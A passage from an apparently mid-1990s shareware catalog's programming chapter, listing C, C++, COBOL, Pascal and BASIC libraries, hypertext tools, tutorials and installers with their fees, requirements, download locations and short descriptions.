or better. + Strongly recommended: Hard disk. + Registration fee: $24.95 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; all ASP- + wide offers (see page 6). Lifetime free upgrading allowed. 10 + free update disk(s) sent out. + Look for: availability unknown on BBSs; CXREF3.ZIP on CompuServe + in CIS:IBMPRO forum LIBrary 0 (or contact userID 71573,616 for + assistance). + SWREG#: 1394 + Download size: 90k (about seven minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + C programmers will find this useful for program debugging, + documentation, maintenance and modification. Generates the + following output: + * A list of the module's global variables and constants, + along with the line numbers they appear on + * A summary listing of the module's functions + * A verbose list of all the module's functions + * A tree that displays all of the functions calling + hierarchy + + + Product: c-scope + Easy to use C program static analysis tool. See full + description on page 492. + + Product: CEnvi + Author: Nombas, 617-391-6595 + Version: 1.006 (10-14-93) + Needs: IBM PC, DOS 3.0 or better. 200k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $38.00 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, mail + support; all ASP-wide offers (see page 6); discounts on other + products. Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; CENVID.ZIP on CompuServe + in CIS:IBMSYS forum LIBrary 1 (or contact userID 72212,1622 for + assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Implements the Cmm advanced scripting language (based on C) to + enhance batch files or to quickly create utilities. Now 'C' is + as easy to use as a batch file. 150+ built-in functions or + create your own. Interact with DOS commands, interrupts, and + + Chapter 12, "Computer programming" 471 + + + + environment variables. 50 sample utilities are included to + demonstrate Cmm programming, batch loops, environment + variables, user input, time, sounds, setting ERRORLEVEL, file + read/write, and much more. + + + Product: CodeLister + Author: Malcolm D. McDowell, 613-825-8593 + Version: 1.21 (08-15-93) + Needs: IBM PC, DOS 4.0 or better. Graphics-capable printer. + Registration fee: $20.00 + Registration benefits: Printed manual, master disks, five months + of support. + Look for: CL121.ZIP on BBSs; CL121.ZIP on CompuServe in + CIS:IBMPRO forum LIBrary 1 (or contact userID 71232,455 for + assistance). + Download size: 45k (about four minutes with a 2400 baud modem) + Description: + For developers of C source code. Project files and single + source files are printed on single or multiple pages per sheet. + Each page contains a header with the file name, edit date and + page. A Table of Contents lists the function names and page + number. The number of lines of code are also printed. + + + Product: DMalloc + Author: Software & Consulting, +43-1-876-46-090 + Version: 1.0 (10-11-92) + Needs: IBM PC, DOS 3.3 or better. MS-C 5.1, 6+, 7, large model. + Registration fee: $47.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 6 months of phone, fax, CompuServe support; + 1-month return policy; bonus utilities. + Look for: availability unknown on BBSs; DML100.ZIP on CompuServe + in CIS:MSLANG forum LIBrary 3 (or contact userID 100015,551 for + assistance). + Download size: 194k (about 15 minutes with a 2400 baud modem) + Description: + v/ Tracks and checks calls to memory allocation and + deallocation, even in third-party code. + v/ Use as a background watchdog, or interactively review the + status of the dynamic heap. Cooperates with debuggers, + special support for CodeView and Soft-ICE is provided. + v/ Uses popup windows, or an alternate display for graphic + oriented applications. + v/ Simply relink your app with the library - no recompilation + necessary! + + Chapter 12, "Computer programming" 472 + + + + Product: EMS4C Library + Author: MarshallSoft Computing, Inc., 205-881-4630 + Version: 1.0 (10-18-93) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EMS + memory; XMS memory. + Strongly recommended: Hard disk. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited fax, BBS, newsletter, + mail support; royalty-free source code; bonus utilities; all + ASP-wide offers (see page 6). + Look for: EMS4C10.ZIP on BBSs (call 205-880-9748 to download it + at no charge); EMSC10.ZIP on CompuServe in CIS:IBMPRO forum + LIBrary 3 (or contact userID 70671,1340 for assistance); + EMS4C10.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 10912 + Download size: 42k (about three minutes with a 2400 baud modem) + Description: + Implements version 3.2 of the LIM (Lotus-Intel-Microsoft) + specification for expanded memory. It runs with version 3.2 and + 4.0 of the LIM specification. Included is the EMM4C library + which allows C programmers to allocate and free EMS memory + similiar to malloc() and free(). + + + Product: Keyed File System (DOS) + MS/C subroutines for keyed file support. See full description + on page 452. + + Product: LZW Data Compr. Lib for Windows + Author: MarshallSoft Computing, Inc., 205-881-4630 + Version: 1.0 (07-12-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Strongly recommended: Hard disk. + Registration fee: $45.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; royalty-free source code; all ASP- + + Chapter 12, "Computer programming" 473 + + + + wide offers (see page 6); disks of other shareware; + registration commissions. + Look for: LZW4W10.ZIP on BBSs (call 205-880-9748 to download it + at no charge); LZWW10.ZIP on CompuServe in CIS:IBMPRO forum + LIBrary 3 (or contact userID 70671,1340 for assistance); + LZW4W10.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 11482 + Download size: 32k (about three minutes with a 2400 baud modem) + Description: + A data compression library for C Windows programmers which uses + the LZW algorithm as published in research papers by Lempel, + Ziv, ands Welch. Supports Borland C/C++ and Microsoft C/C++ + Windows compilers. + + + Product: LZW Data Compression for C + Author: MarshallSoft Computing, Inc., 205-881-4630 + Version: 1.4 (06-01-94) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Strongly recommended: Hard disk. + Registration fee: $45.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; royalty-free source code; all ASP- + wide offers (see page 6); disks of other shareware. + Look for: LZW4C14.ZIP on BBSs (call 205-880-9748 to download it + at no charge); LZWC14.ZIP on CompuServe in CIS:IBMPRO forum + LIBrary 3 (or contact userID 70671,1340 for assistance); + LZW4C14.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 10910 + Download size: 36k (about three minutes with a 2400 baud modem) + Description: + A data compression library for C programmers based on the LZW + algorithm as published in research papers by Lempel, Ziv, and + Welch. The LZW algorithm is probably the best generic + compression algorithm know today. Supports Borland C, Turbo C, + Microsoft C, and MIX Power C. Includes example programs (with + source code) to compress & expand a single file, create a + multi-file archive, extract files from the archive, and a LZW + test program. + + Chapter 12, "Computer programming" 474 + + + + Product: MEGIK + Author: Advanced Topics + Version: 1.1 (09-20-94) + Needs: IBM PC, DOS 2.1 or better. EGA monitor. Microsoft C 6.0 + or higher; or Borland C++ 3.x. + Strongly recommended: Hard disk. + Registration fee: $99.00 (add $12.00 for shipping to U.S. + addresses) (add $12.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited fax, mail support; + royalty-free runtime license; discounts on upgrades. + Look for: MGK110*.* on BBSs (multiple files). + PsL#: 11297 + Download size: 410k (about 31 minutes with a 2400 baud modem) + Description: + Lets you create powered GUI apps for DOS, Windows, OS/2. With + the same source code apps run portably on all platforms. The + API supports windows, menus, dialogs, controls, events, + graphics, bitmaps, icons, fonts and more. Easier and faster to + program than native GUIs. Example code. Over 300 pages of + comprehensive documentation. + + + Product: Personal Comm Lib for Windows + Author: MarshallSoft Computing, Inc., 205-881-4630 + Version: 1.1 (08-01-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Strongly recommended: Hard disk; Hayes-compatible modem. + Registration fee: $65.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; royalty-free source code; bonus + utilities; all ASP-wide offers (see page 6); disks of other + shareware. + Look for: PCL4W11.ZIP on BBSs (call 205-880-9748 to download it + at no charge); PCLW11.ZIP on CompuServe in CIS:IBMPRO forum + LIBrary 3 (or contact userID 70671,1340 for assistance); + PCL4W11.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 11171 + Download size: 78k (about six minutes with a 2400 baud modem) + Description: + An asynchronous comm library for Windows developers. Supports + COM1 to COM4 from 300 to 115200 baud, 4 ports concurrently, all + memory models, DigiBoard PC/4 & PC/8, 16550 UART, interrupt + driven, RTS/CTS flow control. Requires Microsoft C 7.0 or + Borland C 3.1 & 4.0. Includes simple windows terminal program. + + Chapter 12, "Computer programming" 475 + + + + Product: Personal Comm Library for C + Author: MarshallSoft Computing, Inc., 205-881-4630 + Version: 4.2 (09-01-94) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Strongly recommended: Hayes-compatible modem. + Registration fee: $65.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; source code; bonus utilities; all + ASP-wide offers (see page 6); disks of other shareware. + Look for: PCL4C42.ZIP on BBSs (call 205-881-9748 to download it + at no charge); PCLC42.ZIP on CompuServe in CIS:IBMPRO forum + LIBrary 3 (or contact userID 70671,1340 for assistance); + PCL4C42.ZIP on GEnie in IBMPC forum LIBrary 4. + SWREG#: 287 + PsL#: 10908 + Download size: 85k (about seven minutes with a 2400 baud modem) + Description: + An asynchronous communications library supporting COM1 to COM16 + from 300 to 115200 baud, 4 ports concurrently, all memory + models, DigiBoard PC/4 & PC/8, dumb BOCA boards, + 8250/16450/16550 UARTS, interrupt driven, RTS/CTS flow control. + Supports Borland C, Turbo C, Microsoft C, MIX Power C, and + Quick C. Includes a terminal program with ASCII, XMODEM, + YMODEM, and YMODEM-G. + + + Product: Personal Protocol Lib for C/C++ + Author: MarshallSoft Computing, Inc., 205-881-4630 + Version: 1.0 (02-12-95) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Personal Communications Library for C/C++ (PCL4C). + Strongly recommended: Hayes-compatible modem. + Registration fee: $40.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, mail + support; royalty-free source code; bonus utilities; all ASP- + wide offers (see page 6); disks of other shareware. + Look for: PPL4C10.ZIP on BBSs (call 205-880-9748 to download it + at no charge); PPLC10.ZIP on CompuServe in CIS:PCPRO forum + LIBrary 3 (or contact userID 70671,1340 for assistance); + PPL4C10.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 11782 + Download size: 83k (about six minutes with a 2400 baud modem) + Description: + A protocol library supporting ASCII, XMODEM, YMODEM, and ZMODEM + protocols. Supports most C compilers incluidng Turbo C, Borland + C, Microsoft C, and MIX Power C. + + Chapter 12, "Computer programming" 476 + + + + Product: Power C Shell + Author: Tay-Jee Software, 703-261-7023 + Version: 2.3 (09-01-93) + Needs: IBM PC, DOS 2.11 or better. 256k RAM. Power C compiler + from MIX Software. + Strongly recommended: Hard disk. + Registration fee: $19.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. + Look for: PCSHEL??.ZIP on BBSs; PCSHEL.ZIP on CompuServe in + CIS:IBMPRO forum LIBrary 3 (or contact userID 72330,1776 for + assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Provides a programming environment shell for Power C from MIX + Software. Customizable with your own editor and viewer, it + makes the editing/compiling/debugging/testing process a snap. + Customizable colors and compile/link options. Features pull- + down menus, environment variables, library management, and + project support. Context-sensitive help, shell-to-DOS option. + Access Power C Trace interactive debugging utility from IDE. + Bundled by Mix Software with the Power C compiler. + + + Product: The Window BOSS & Data Clerk + Author: Star Guidance Consulting, Inc., 203-574-2449 + Version: 8.02 (08-15-94) + Needs: IBM PC, DOS 2.1 or better. CGA monitor; Hercules monitor; + Hard disk. "C" Compiler (Microsoft, Borland, Watcom). + Strongly recommended: Mouse; CD-ROM drive. + Registration fee: $55.00 (add $6.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, CompuServe, GEnie support; royalty-free source code; + royalty-free runtime license; discounts on upgrades. 2-month + free upgrading allowed. + Look for: BOZZ.ZIP on BBSs (multiple files); BOSS.ZIP on + CompuServe in CIS:IBMPROG forum LIBrary 3 (multiple files) (or + contact userID 71565,1001 for assistance); BOSS.ZIP on GEnie in + IBMPC forum LIBrary 9 (multiple files) (or contact userID + MONGELLUZZO for assistance). + SWREG#: 3667 + PsL#: 10171 + Download size: 500k (about 37 minutes with a 2400 baud modem) + Awards & nominations: 1993 finalist, Shareware Industry Awards. + Description: + Comprehensive set of windowing, data entry, and mouse + manipulation functions for the "C" language. Pop-up windows, + pull down menus, CUA(s), status lines, and the like can be + easily implemented. Makes it a snap to enter text, integers, + + Chapter 12, "Computer programming" 477 + + + + floats, longs, dates, phone numbers, and times. Complex forms + with individual field validation checks, help and error + messages are a snap. The programmer interface is clean, + uncluttered, and easy to remember. Generated code is fast and + small! + + + 12.4.3.1 C++ + + Product: EZinst + Windows installation. See full description on page 486. + + Product: Playground + Tool for building object models. See full description on + page 451. + + Product: Technical Editor (Windows NT) + Programmers/text editor. See full description on page 226. + + Product: Wndlib + Author: Burnham Park Software, Inc., 312-922-6313 + Version: 1.0 (03-25-94) + Needs: IBM 80386, Windows 3.1 or better. 2048k RAM; EGA monitor; + Hard disk. + Registration fee: $22.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, mail + support; royalty-free source code; bonus data; all ASP-wide + offers (see page 6); discounts on other products; discounts on + upgrades. Lifetime free upgrading allowed. + Look for: WNDLIB10.ZIP on BBSs (call 312-922-2839 to download it + at no charge); WNDLI*.ZIP on CompuServe in CIS:BCPPWIN forum + LIBrary 10 (or contact userID 71532,3271 for assistance). + Download size: 81k (about six minutes with a 2400 baud modem) + Description: + A set of C++ class libraries to aid Windows programming. + + Chapter 12, "Computer programming" 478 + + + + 12.4.4 COBOL + + Product: PROGRAM ENTITY ORGANIZER + Author: James W. Young & Associates, Inc., 916-756-4976 + Version: 1.2 (02-01-94) + Needs: IBM 80386, DOS 5.0 or better. EGA monitor; Hard disk. + Strongly recommended: VGA monitor; XMS memory. + Registration fee: $119.00 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of CompuServe, mail support; 3-month + limited return policy; all ASP-wide offers (see page 6). + Lifetime free upgrading allowed. + Look for: PEO.ZIP on BBSs; PEO.ZIP on CompuServe in CIS:IBMPRO + forum LIBrary 5 (or contact userID 73323,2105 for assistance). + Download size: 380k (about 28 minutes with a 2400 baud modem) + Description: + Guides the user through the myriad data and logic paths, in all + directions; has editor to document data transformations, + control logic, business functions; retraces data/logic paths; + includes subprograms automatically; relates element to actions + of group; supports REPLACING, RENAMES, alternate entries, + redefinitions, qualification; identifies parm/arg aliases; + combines programs, prints call hierarchy; has data name filter. + No limit on program size. Proven on the job for two years! + + + 12.4.5 Pascal + + Product: LZW Data Compression for Pascal + Author: MarshallSoft Computing, Inc., 205-881-4630 + Version: 1.4 (06-01-94) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Strongly recommended: Hard disk. + Registration fee: $45.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; royalty-free source code; all ASP- + wide offers (see page 6); disks of other shareware. + Look for: LZW4P14.ZIP on BBSs (call 205-880-9748 to download it + at no charge); LZWP14.ZIP on CompuServe in CIS:IBMPRO forum + LIBrary 5 (or contact userID 70671,1340 for assistance); + LZW4P14.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 10911 + Download size: 29k (about two minutes with a 2400 baud modem) + Description: + A data compression library for Turbo Pascal programmers which + is based on the LZW algorithm as published in research papers + by Lempel, Ziv, and Welch. The LZW algorith is probably the + best generic compression algorithm known today. Includes + + Chapter 12, "Computer programming" 479 + + + + example programs to compress and expand a file, make a + compressed file archive and a LZW test driver. + + + Product: Personal Com Lib for PowerBASIS + Author: MarshallSoft Computing, Inc., 205-881-4630 + Version: 4.2 (09-01-94) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Strongly recommended: Hard disk; Hayes-compatible modem. + Registration fee: $65.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; source code; royalty-free runtime + license; bonus utilities; all ASP-wide offers (see page 6). + Look for: PCL4PB42.ZIP on BBSs (call 205-881-9748 to download it + at no charge); PCL4PB.ZIP on CompuServe in CIS:IBMPRO forum + LIBrary 4; PCL4PB42.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 11499 + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + An asynchronous communications library supporting PoerBASIC. + Supports COM1 to COM16, 300 to 115200 baud, 4 ports + concurrently, complete line/modem status & control, interrupt + driven, 8250/16450/16550, RTS/CTS flow control, Digiboard PC/4 + & PC/8, and BOCA BB2016. Includes terminal program with XMODEM + & YMODEM. + + + Product: Personal Comm Lib for BASIC + Author: MarshallSoft Computing, Inc., 205-881-4630 + Version: 4.2 (09-01-94) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Strongly recommended: Hard disk; Hayes-compatible modem. + Registration fee: $65.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; source code; royalty-free runtime + license; bonus utilities; all ASP-wide offers (see page 6); + disks of other shareware. + Look for: PCL4B42.ZIP on BBSs (call 205-880-9748 to download it + at no charge); PCLB42.ZIP on CompuServe in CIS:IBMPRO forum + LIBrary 4; PCL4B42.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 11499 + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + An asynchronous communications library supporting Microsoft + Visual BASIC fdor DOS. Supports COM1 - COM16 at 300 to 115200 + baud, 4 ports concurrently, complete line/modem status & + + Chapter 12, "Computer programming" 480 + + + + control, interrupt driven, 8250,16450/16550 UARTS, RTS/CTS flow + control, Digiboad PC/4 & PC/8, BOCA BB2016. Includes terminal + program with XMODEM and YMODEM. + + + Product: Personal Comm Lib for Pascal + Author: MarshallSoft Computing, Inc., 205-881-4630 + Version: 4.2 (09-01-94) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Strongly recommended: Hard disk; Hayes-compatible modem. + Registration fee: $65.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; royalty-free source code; bonus + utilities; all ASP-wide offers (see page 6); disks of other + shareware. + Look for: PCL4P42.ZIP on BBSs (call 205-880-9748 to download it + at no charge); PCLP42.ZIP on CompuServe in CIS:PCPRO forum + LIBrary 5 (or contact userID 70671,1340 for assistance); + PCL4P42.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 10909 + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + An asynchronous communications library supporting Turbo Pascal + version 4.0 and up. Supports COM1-COM16, 300 to 115200 baud, 4 + ports concurrently, complete line/modem status & control, + interrupt driven, 8250/16450/16550 UARTs, RTS/CTS flow control, + DigiBoard PC/4 & PC/8, and dumb BOCA boards. Includes terminal + program with ASCII, XMODEM, YMODEM, YMODEM-G. + + + Product: Personal Protocol Lib 4 Pascal + Author: MarshallSoft Computing, Inc., 205-881-4630 + Version: 1.0 (02-12-95) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Personal Communications Library for Pascal (PCL4P). + Strongly recommended: Hayes-compatible modem. + Registration fee: $40.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; royalty-free source code; bonus + + Chapter 12, "Computer programming" 481 + + + + utilities; all ASP-wide offers (see page 6); disks of other + shareware. + Look for: PPL4P10.ZIP on BBSs (call 205-880-9748 to download it + at no charge); PPLP10.ZIP on CompuServe in CIS:PCPRO forum + LIBrary 5 (or contact userID 70671,1340 for assistance); + PPL4P10.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 11783 + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + A protocol library featuring ASCII, XMODEM, YMODEM, and ZMODEM + protocols. Supports Borland Turbo Pascal 4.0 and up. + + + 12.4.5.1 OOP Pascal for DOS (Borland) + + Product: TURBO TPU TOOLKIT! + Pascal math function toolkit. See full description on + page 499. + + 12.4.6 Other + + Product: Ahelp Clipper Help Library + Advanced help library for Clipper developers. See full + description on page 497. + + Product: EXTENDED BATCH LANGUAGE-PLUS! + The real batch language you wish DOS had. See full description + on page 125. + + Product: PowerBatch + Batch file replacement creates compiled pgms. See full + description on page 130. + + Product: RexxBase + The dBase Database For Rexx. See full description on page 453. + + Product: RTAG + Ray tracing animation generator. See full description on + page 563. + + Product: Simply Help! + Create hypertext documents - EXE/TSR/QB/PDS. See full + description on page 484. + + + 12.5 Hypertext/hypermedia + + See also: Business, Training & support aids. + + Chapter 12, "Computer programming" 482 + + + + Product: DeskTop Advisor(R) + Author: Ivden Technologies, Inc., 610-328-1145 + Version: 2.0 (12-04-93) + Needs: IBM PC, DOS 2.1 or better. 7k RAM; CGA monitor; Hercules + monitor; Hard disk. Browser (launched via hot key) needs 512k + RAM minimum. + Strongly recommended: VGA monitor; EMS memory; XMS memory. + Registration fee: $59.00 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 3 months of unlimited + phone, fax, CompuServe, mail support; 3-month return policy; + royalty-free runtime license; bonus utilities; bonus data; all + ASP-wide offers (see page 6). 1 free update disk(s) sent out. + Bonus Sound Support(tm) to enhance online help. + Look for: DTA20*.ZIP on BBSs (multiple files) (call 215-673-6915 + to download it at no charge); DTA20*.ZIP on CompuServe in + CIS:MULTIMEDIA forum LIBrary 11 (multiple files) (or contact + userID 71221,3602 for assistance). + SWREG#: 2832 + PsL#: 11407 + Download size: 678k (about 51 minutes with a 2400 baud modem) + Description: + A hyperdocument authoring & delivery system. It is an easy-to- + use tool for creating and distributing on-line documents in + hypertext form. These hyperdocuments can be electronically + browsed for learning, research, reference, or instant help + purposes. Attach images and sound (e.g., voice annotation). + Three navigational modes are supported: menu selection, keyword + query, and hyperlink. Has a TSR shell for popping up over + other applications when needed. + + + Product: Simply Help! + Author: SimpleWare + Version: 1.06 (04-08-92) + Needs: IBM PC, DOS 3.1 or better. 512k RAM. 384k, Hard drive + recommended. + Strongly recommended: Hard disk; Mouse. + Registration fee: $35.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, BBS, mail support; royalty-free + runtime license; + Look for: SIMHLP1C.ZIP on BBSs (call 709-489-6018 to download it + at no charge). + Download size: 353k (about 26 minutes with a 2400 baud modem) + Description: + Integrated environment to create text based hypertext documents + and help systems. Documents are based on a series of one or + more screens linked together by links. Includes editor, + compiler, EXE/TSR viewers and libraries for QB 4.xx and PDS 7.1 + editor has pull down menus, dialog boxes, mouse support, on- + + Chapter 12, "Computer programming" 483 + + + + line help, block operations, line drawing, import/export, + reports, much more. Create TSR help for existing programs, + catalogs, readme files, manuals, on-line help for BASIC progs, + BBS help systems + + + 12.6 Tutorials + + See also: Education, Computers. + + Product: Basic Training + Author: Cascoly Software, 206-523-6135 + Version: 1.01 (10-07-92) + Needs: IBM PC, DOS 2.1 or better. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited CompuServe, mail support; bonus utilities; + disks of other shareware; discounts on other products. Bonus + source code. + Look for: availability unknown on BBSs; BT.ZIP on CompuServe in + CIS:IBMPRO forum LIBrary 4 (or contact userID 76703,3046 for + assistance). + SWREG#: 380 + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + This tutorial introduces the elements of BASIC including simple + controls, looping, color & sound, arrays & DATA, GOSUBs and + functions, files, simple graphics. Interactive tutorial comes + complete with numerous examples you can run and modify. When + you've mastered this, you're ready for advanced BASIC. Topics + include animation techniques, shape shifting techniques, error + handling, chaining, windows, peek/poke, bload/bsave, plus, + details on diff + + + Product: The DemoMaker + Author: Ron Janorkar, 212-334-1243 + Version: 1.55 (04-02-94) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Hard disk. + Strongly recommended: CGA monitor. + Registration fee: $20.00 + Registration benefits: lifetime unlimited phone, fax, BBS, mail + support; site license; all ASP-wide offers (see page 6); disks + of other shareware. Lifetime free upgrading allowed. + Look for: DMAKE155.ZIP on BBSs (call 718-716-6198 to download it + at no charge). + Download size: 155k (about twelve minutes with a 2400 baud modem) + Description: + A powerful software tool that creates presentation demos of any + DOS based program. It allows software authors to create live + color demonstrations of their products, to show the various + capabilities of their programs, in the form of compact self + running presentations. Sysops can use it to create slide shows + + Chapter 12, "Computer programming" 484 + + + + of their systems to graphically demonstrate all the features + their BBS has to offer. Very easy to use and creates compact + EXE files. + + + 12.7 Software installation aids + + Product: CzarInstall for DOS [***] + Author: CZAR Software, 915-595-8787 + Version: 1.02 (04-20-95) + Needs: IBM PC, DOS 3.0 or better. 320k RAM. + Registration fee: $29.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, fax, BBS, CompuServe, mail support; royalty-free runtime + license; site license; all ASP-wide offers (see page 6); + discounts on other products; discounts on upgrades. + Look for: CZINS102.ZIP on BBSs (call 915-595-8705 to download it + at no charge); CZINS1.ZIP on CompuServe in CIS:BASIC forum + LIBrary 10 (or contact userID 71031,3614 for assistance). + SWREG#: 4416 + PsL#: 11780 + Download size: 520k (about 39 minutes with a 2400 baud modem) + Description: + Fully mouse driven, professional install program for software + developers. Built-in ZIP compression, split files, create + commercial distribution disks or shareware distribution + packages with a touch of a button, change envir. variables, + master- disk creator, SAA/GUI 3-d Interface, ANSI wallpapers + during install without using ANSI.SYS. + + + Product: Easy Install + Author: Easy Software, 01625-614669 + Version: 4.4 (06-15-95) + Needs: IBM PC, DOS 5.0 or better. 512k RAM; Hard disk. + Registration fee: $40.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + CompuServe, mail support; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + SWREG#: 3045 + PsL#: 11491 + Download size: 211k (about 16 minutes with a 2400 baud modem) + Description: + At the touch of a key, it will create self installing + distribution disks in compressed form. There is no need to + create separate packed files for different disk sizes - just + tell it which directory your program is in and which drive to + create the Installation disk(s) on. Your program will be packed + onto however many disks are necessary. The end user simply + types "Install" on disk one. Also transfers a customizeable + Readme.Bat file to Disk One. + + Chapter 12, "Computer programming" 485 + + + + Product: EZinst + Author: Burnham Park Software, Inc., 312-922-6313 + Version: 1.2 (07-28-94) + Needs: IBM AT (80286), Windows 3.1 or better. 1024k RAM; Program + can run safely on a system with no hard disk and only one + floppy disk drive; EGA monitor. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $22.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, mail + support; royalty-free source code; bonus utilities; discounts + on other products; discounts on upgrades. Lifetime free + upgrading allowed. + Look for: EZINST12.ZIP on BBSs (call 312-922-2839 to download it + at no charge); EZINS*.ZIP on CompuServe in CIS:BCPPWIN forum + LIBrary 9 (or contact userID 71532,3271 for assistance). + SWREG#: 3782 + Download size: 54k (about four minutes with a 2400 baud modem) 